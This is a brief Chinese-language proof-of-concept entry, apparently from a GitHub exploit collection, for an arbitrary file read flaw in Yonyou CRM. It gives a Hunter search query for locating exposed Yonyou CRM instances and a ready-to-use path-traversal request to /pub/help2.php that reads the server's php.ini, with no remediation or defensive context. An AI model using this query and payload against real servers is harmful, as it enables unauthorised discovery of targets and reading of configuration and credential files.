## 用友CRM 任意文件读取漏洞

## hunter
```
app.name="用友 CRM"
```

## poc
```
http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
```
![image](https://github.com/wy876/POC/assets/139549762/419deef4-d49f-4fe2-aa80-0c6b93174f58)